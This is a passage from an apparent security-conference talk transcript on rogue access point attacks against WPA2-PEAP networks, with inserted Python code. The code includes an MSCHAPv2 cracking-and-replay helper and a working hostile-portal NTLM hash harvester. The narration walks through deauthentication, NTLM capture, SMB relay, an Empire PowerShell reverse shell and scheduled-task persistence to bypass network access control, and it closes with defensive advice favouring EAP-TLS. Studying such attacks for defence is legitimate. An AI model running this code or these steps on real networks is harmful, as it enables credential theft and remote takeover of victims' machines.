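    return "%s:$NETNTLM$%s$%s" % (username, chal.hex(), nt_response.hex())


def eap_user_entry(username: str, password: str) -> str:
    """Phase-2 line appended to hostapd's eap_user file so the victim's next attempt can be completed."""
    return '"%s"\tMSCHAPV2\t"%s"\t[2]' % (username, password)


# RFC 2759 section 9.2 test vector (public data, not a captured credential).
RFC_USER, RFC_PASSWORD = "User", "clientPass"
RFC_AUTH_CHALLENGE = bytes.fromhex("5B5D7C7D7B3F2F3E3C2C602132262628")
RFC_PEER_CHALLENGE = bytes.fromhex("21402324255E262A28295F2B3A337C7E")
RFC_NT_RESPONSE = bytes.fromhex("82309ECD8D708B5EA08FAA3981CD83544233114A3D85D6DF")

if __name__ == "__main__":
    print("to rig   :", jtr_netntlm_line(RFC_USER, RFC_PEER_CHALLENGE, RFC_AUTH_CHALLENGE, RFC_NT_RESPONSE))
    cracked = RFC_PASSWORD  # assumption: this is what the rig sent back
    print("eap_user :", eap_user_entry(RFC_USER, cracked))
    for guess in (cracked, "notThePassword"):  # only the right password yields the value the client expects
        print("S for %-15s:" % guess, authenticator_response(guess, RFC_NT_RESPONSE, RFC_PEER_CHALLENGE,
                                                             RFC_AUTH_CHALLENGE, RFC_USER))
```

The client computes the same `S=` string from its own copy of the password and drops the association if the server's value differs, which is why the capture alone is not enough and the password has to be in the eap_user file before the victim's next attempt.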
and paste this MAC address from here and see if I can try it again. Alright, try number 2. Oh, you know what this is? You see how I’m clicking this thing right here over and over again and it’s not bringing up the network manager? That’s because I’m using a virtual machine and the virtual interface has cooked itself and is not doing a thing. But luckily I came prepared, because I seem to be on the demo gods’ bad side recently. So we’ll just go that route. OK, so back to where we were. In the top right we have the legitimate access point. Now we’re going to create a wifi network called example wifi. It’s going to be a PEAP network. In the bottom right we’re going to have Jenkins this time, and Jenkins is going to attempt to authenticate with this. This is a valid access point, so we’re just going to go ahead and connect them. And then the left-hand side of the screen here is where we’re going to launch the rogue access point attack. So we’re going to create that. We’ve created the rogue AP and started it. And then in this tab right here we’re going to perform the deauth attack to get it to roam over to us. Sometimes what happens... Oh, wait, yeah, so sometimes what happens here is that certain clients will actually just pop off the network completely, but then when they try to reassociate they’ll end up on the rogue AP. So a little user inconvenience there, but we don’t really care about them anyway. So we see here that we’ve captured the credentials. They’ve been written to the end of the EAP user file, so we’re just going to cat the contents of that file really fast. Here we go. At the end, they’ve been added. So now we’re going to repeat the attack. And notice that when we do that...
Go ahead and accept that cert warning that is popping up. So we do that. Interesting thing: sometimes, for some reason, when you connect to a network IE just manages to open itself, by itself. And of course when that happens you’re going to send HTTP traffic and you get hashes. And also check this out, this is going to be pretty cool. Every time you type in a character in the IE address bar, it tries to do a Bing search. So we’re doing this, and it’s making an HTTP request each time, so every time you type a character we’re just getting a hash over and over and over again. In fact it looks like the panel over here is starting to complain that we’re doing it so often, and IE is like, what’s going on? We can’t request anything. So yeah, that’s a hostile portal attack against WPA2-PEAP. And what this gets you is lots and lots of NTLM hashes. You get similar results to LLMNR/NBT-NS poisoning, but there are a few key advantages here: no direct network access required, and you’re not limited to a local subnet; you get everything that is connected to wireless. And it’s also not a passive attack. You’re not waiting for LLMNR to show up on your local subnet; you’re actually forcing things to happen. So back to our scenario. Here we are. We’re going to do a new technique that builds off the hostile portal attack, a technique for using a rogue AP attack to bypass port-based access control mechanisms. So here we are with the attacker. We’re back on this quarantine VLAN and we’re actually going to do our escape attempt now. Once again we’ve been quarantined here by the NAC, and over here we have the victim that’s been placed in the restricted VLAN. And obviously you want to get over here and access the sensitive resources.
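The HTTP-to-NTLM step that the hostile portal demos above rely on (every IE request, including the Bing lookups, coming back as a hash), as an added example that is not code from the talk, eaphammer or Responder. It is the request-handling logic only: answer every request with a 401 demanding NTLM, hand back a CHALLENGE_MESSAGE carrying a constant server challenge, and convert the client's AUTHENTICATE_MESSAGE into a hashcat/john NetNTLM line. The constant challenge value, the NegotiateFlags, and the sample Type 3 message (built by `build_type3` from made-up response bytes, since no Windows client is involved) are all assumptions for the demo; the field layout follows MS-NLMP.

```python
"""Hostile-portal NTLM harvesting logic (added example, not from the talk or eaphammer).

Every HTTP request from the captive client is met with an NTLM challenge; the Type 3 reply
is turned into a crackable line. The server challenge is constant so every capture can be
attacked offline the same way (assumption for this example; Responder uses the same constant).
"""
import base64
import struct

NTLMSSP = b"NTLMSSP\x00"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
FLAG_UNICODE = 0x00000001
# UNICODE | REQUEST_TARGET | NTLM | ALWAYS_SIGN | TARGET_TYPE_SERVER | EXTENDED_SESSIONSECURITY (assumed set)
TYPE2_FLAGS = 0x00000001 | 0x00000004 | 0x00000200 | 0x00008000 | 0x00020000 | 0x00080000


def build_type2(challenge: bytes = SERVER_CHALLENGE) -> bytes:
    """CHALLENGE_MESSAGE (MS-NLMP 2.2.1.2) with empty TargetName, no TargetInfo, no Version: 48 bytes."""
    fixed_len = 48
    return (NTLMSSP + struct.pack("<I", 2)
            + struct.pack("<HHI", 0, 0, fixed_len)    # TargetNameFields
            + struct.pack("<I", TYPE2_FLAGS)
            + challenge + b"\x00" * 8                 # ServerChallenge, Reserved
            + struct.pack("<HHI", 0, 0, fixed_len))   # TargetInfoFields


def _field(msg: bytes, offset: int) -> bytes:
    """Resolve one (Len, MaxLen, BufferOffset) descriptor to the bytes it points at."""
    length, _maxlen, start = struct.unpack_from("<HHI", msg, offset)
    if start + length > len(msg):
        raise ValueError("field points outside message")
    return msg[start:start + length]


def parse_type3(msg: bytes) -> dict:
    """Extract user, domain, workstation and both responses from an AUTHENTICATE_MESSAGE (2.2.1.3)."""
    if len(msg) < 64 or msg[:8] != NTLMSSP or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP type 3 message")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & FLAG_UNICODE else "cp437"   # OEM strings approximated as cp437
    return {"lm_response": _field(msg, 12), "nt_response": _field(msg, 20),
            "domain": _field(msg, 28).decode(enc), "user": _field(msg, 36).decode(enc),
            "workstation": _field(msg, 44).decode(enc)}


def to_crackable(auth: dict, challenge: bytes = SERVER_CHALLENGE) -> str:
    """hashcat -m 5600 (NetNTLMv2) or -m 5500 (NetNTLMv1) format, chosen by response length."""
    nt = auth["nt_response"]
    if len(nt) > 24:  # NTLMv2: 16-byte NTProofStr followed by the client blob
        return "%s::%s:%s:%s:%s" % (auth["user"], auth["domain"], challenge.hex(), nt[:16].hex(), nt[16:].hex())
    return "%s::%s:%s:%s:%s" % (auth["user"], auth["domain"], auth["lm_response"].hex(), nt.hex(), challenge.hex())


def portal_reply(authorization):
    """One request -> (HTTP status, WWW-Authenticate value, harvested line or None)."""
    if not authorization or not authorization.startswith("NTLM "):
        return 401, "NTLM", None                                    # step 1: demand NTLM
    msg = base64.b64decode(authorization[5:])
    if len(msg) >= 12 and struct.unpack_from("<I", msg, 8)[0] == 1:
        return 401, "NTLM " + base64.b64encode(build_type2()).decode(), None   # step 2: our challenge
    return 401, "NTLM", to_crackable(parse_type3(msg))              # step 3: harvest, keep client unauthenticated


def build_type3(domain: str, user: str, workstation: str, lm_response: bytes, nt_response: bytes) -> bytes:
    """Pack a Type 3 the way a client would; used only to construct the sample below."""
    parts = [lm_response, nt_response, domain.encode("utf-16-le"), user.encode("utf-16-le"),
             workstation.encode("utf-16-le"), b""]                  # last descriptor: session key (empty)
    header, payload, offset = NTLMSSP + struct.pack("<I", 3), b"", 64
    for p in parts:
        header += struct.pack("<HHI", len(p), len(p), offset)
        payload += p
        offset += len(p)
    return header + struct.pack("<I", FLAG_UNICODE | 0x00000200) + payload   # flags land at offset 60


# Constructed sample: random-looking NTProofStr plus a minimal blob, not a real client's answer.
SAMPLE_TYPE3 = build_type3("CORP", "jenkins", "WS01", b"\x00" * 24,
                           bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0") + bytes.fromhex("0101000000000000") + b"\x00" * 24)


def run_demo():
    """Replay the three requests one client makes; returns the three portal_reply() tuples."""
    type1 = NTLMSSP + struct.pack("<I", 1) + struct.pack("<I", FLAG_UNICODE | 0x00000200) + b"\x00" * 16
    headers = [None, "NTLM " + base64.b64encode(type1).decode(), "NTLM " + base64.b64encode(SAMPLE_TYPE3).decode()]
    return [portal_reply(h) for h in headers]


if __name__ == "__main__":
    for status, www_auth, line in run_demo():
        print(status, www_auth[:24], line)
```

Wiring `portal_reply` into an `http.server` handler (read the `Authorization` header, emit the status and `WWW-Authenticate` value, log the line) is all that is left to make this a live portal; keeping the state machine pure is what makes it testable without a Windows client on the air.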
So what if we first, let’s say that we have one network adapter that’s being used to attack this VLAN; what if we take a second network adapter and force this victim to connect to that second network adapter using the evil twin attack? At that point we take the victim off the restricted network that we’re attacking and force them to associate with us. We then attack them using a hostile portal attack to obtain their NTLM hashes, crack the hashes offline, come back later and pick up where we left off. We might have to repeat the first step to make this work, but at that point we can place a timed payload on the victim, right? Like a scheduled task or something. At that point we kill our rogue AP that’s operating on our second network interface. We allow the victim to reassociate with the target network. The NAC moves the victim back to the restricted VLAN because it’s not authorized at that point. Then we just wait for the reverse shell, and this can be the best NAC in the world and it would not even matter. So that was cool, but it requires some offline cracking of NTLM, which we obviously don’t want to do. Well, I mean, it will work, but it would be cooler if we could speed that process up a bit. To do this we can use an SMB relay attack, and we talked about this earlier. With an SMB relay attack, we first use the rogue AP attack as before to force the victims to associate with our hostile portal, and when that happens we initiate the hostile portal attack, but instead of just capturing those NTLM hashes, we perform an SMB relay attack to obtain a shell on one of these victims. And we use that shell to place a timed payload on that victim.
So that happens much more instantaneously; you don’t have to crack those NTLM hashes offline. At this point we kill our rogue AP as before. This allows the victim to reassociate with the target network. Wait for the reverse shell and we’ve bypassed the NAC. And as I said, my USB interface is dead, so I have a backup. So here... Show of hands, how many people have used Empire before? Alright, cool. For those of you who haven’t, check it out. It’s really easy to use and it’s really, really fun. It actually has a module called trollsploit which you can use to just troll your victims, send little prompts that say stuff like "you’ve been disconnected from the domain controller", all kinds of funny stuff. So we’re going to connect these two victim VMs, two at a time, to our legitimate access point over here in the bottom left. On the right here we’re setting up Empire to perform this attack. We’re going to create two listeners; that’s what our victims are going to connect back to. We’ve also created a payload, and this big blob here is a PowerShell command that’s going to give us our reverse shell, and we’re going to tell our SMB relay script, so we’re using smbrelayx, although you can use anything for this really, to execute that on a target machine. We then launch the rogue AP attack. And as before, once the rogue AP is running, we use replay to deauthenticate these devices, forcing them to roam over to us. You can see that happening here. Alright. So we have one associated. We’re going to have to force the other one to associate as well. Sorry, I’ll repeat that. And it’s waiting for beacon frames, so I’m going to fast forward through that. So we’ve got the second victim. The second victim is now going to roam over to us.
And you can see there’s some of that IE weirdness happening in the background when you first connect. But now we’re going to take a payload, and we’re also going to grab the IP address of one of these victims and feed it to our SMB relay script. So we’re just going to copy and paste that over to our SMB relay script, which we’ve done here. Now we’re going to start it. At this point we’re going to generate some HTTP traffic on one of these machines just to make sure the SMB relay attack happens. So we’re doing that here. And notice that you see a lot of activity in the SMB relay terminal; that’s because the attack’s actually executing. And now we just wait for the reverse shell; there was a 45 second delay on the payload. So I’m going to skip a little bit, but I want you guys to see the other one connecting. There it is! That green text. That’s our initial payload. So now the scenario that we have is that we have two devices that are associated with our rogue access point and we’ve used SMB relay to gain a shell on one. So now that we’ve pivoted into one of them, we’re going to use the persistence module from Empire. For illustrative purposes, scheduled tasks work very nicely for this, although it’s also really loud. It touches disk, so in a real scenario you want to use something that lives purely in memory. But I like scheduled tasks because they’re easy to explain for a talk. And you can see now we’ve executed the command hostname and the command whoami. We have NT AUTHORITY privileges on Jenkins up here on the top left. So we’re going to execute the scheduled task and we’re going to set the timer for 2 minutes in the future. And something really interesting happened when I was recording this.
I actually forgot to attach the virtual interface for my USB wifi adapter, the NIC that was connected to the target network. So I was going to start clearing this and just start the recording over again. But something very interesting happened. I had set 160 retries on that reverse shell, for some reason that I don’t know why. So the second I reattached it, the reverse shell just suddenly appeared and worked. I thought that was kind of cool, so I left it in there. And it kind of proves an interesting point about good implants: they’ll doggedly try to get back to the attacker even if they can’t immediately do so. But yeah, we’re going to fast forward a little bit. You see here that we’ve executed the scheduled task... and I’m sure you don’t want to sit here. You can see me wiggling my mouse because I was totally bored waiting for this task to execute, and I’m not going to do that to you guys as well, so I’m going to try to skip through that as much as I can. Alright. At some point this is when I realize that, oh yeah, I didn’t connect this thing. So I fixed the problem by attaching the network adapter. Very, very jerk moment there. And then I started getting ready to start this recording all over again, right? So I started cleaning the terminals, and then I go back to Empire here and I start going back to the main menu and, oh wait! There’s the reverse shell. Alright, so now we’ve received the second reverse shell, this time on the target network, and we can now use this. We’re going to interact with that agent that’s now living on the target machine, and we’ve just pivoted from one VLAN to the other.
So that’s an indirect wireless pivot, and the equivalent technique, I mean it’s actually really straightforward, it’s not very complicated. The equivalent technique in a wired network would be to unplug an authorized device from the wall and connect it to a hostile network on which you can actually attack it. The reason you can do this is because port-based access controls rely on the assumption that the physical layer can be trusted. In a wireless network, WPA is the means through which the integrity of the physical layer is protected. So if you’re using a weak form of WPA2-EAP, the attacker can freely control the physical layer using rogue access point attacks, and this renders port-based NAC mechanisms useless. What this demonstrates is that port-based NAC mechanisms do not effectively mitigate the risk presented by weak WPA2-EAP implementations. Furthermore, it demonstrates that adding port-based NAC mechanisms to a wireless network does not make the use of EAP-TTLS or EAP-PEAP any less inappropriate if the network in question is used to grant access to sensitive information. And finally... oh well. Finally, OK. I guess this is another... I thought there was another slide there. Whatever. OK, so, by the way, when we’re talking about sensitive information, heh, it’s Sunday. When we talk about sensitive information, we’re usually referring to PCI or HIPAA data. But it’s important to remember that compliance doesn’t necessarily mean security. So I’m going to make one last case for EAP-TLS. It still is pretty painful, but it’s not as bad as it used to be. You can use a group policy to configure 802.1X clients, and I think that’s pretty cool. I think your best option is to use a private CA; you can leverage Active Directory to deploy EAP-TLS.
And if you have BYOD processes that you have to worry about, you could just use a solid MDM solution, or even just rely on your onboarding solution to make that work. You can even use Let’s Encrypt to deploy EAP-TLS, although, to be honest, even the folks at Let’s Encrypt state that this is far from the best solution out there. As in, you can technically do this, but... So, just some closing thoughts. Just because wireless and wired networks operate similarly at the logical level, and that’s by design, you don’t want to have to fundamentally think about your networks differently depending on what physical medium you’re working with, that does not mean that they work the same way at the physical level. And you have to remember that when we’re designing security mechanisms that are meant to protect these things. Also, as a community, we should really question whether or not it is a sound business decision to neglect EAP-TLS in favor of a more reactive approach that focuses on access control or threat containment. And finally, if there’s one thing to take away from this, it’s that the needs for convenience and security are often at odds with one another. Be honest with yourselves. Maintain a healthy skepticism toward proposed solutions that promise both. And if you want to check out the attacks and try to implement them yourself, the tool in question is github.com/s0lst1c3/eaphammer. And that’s it. Thank you. [applause]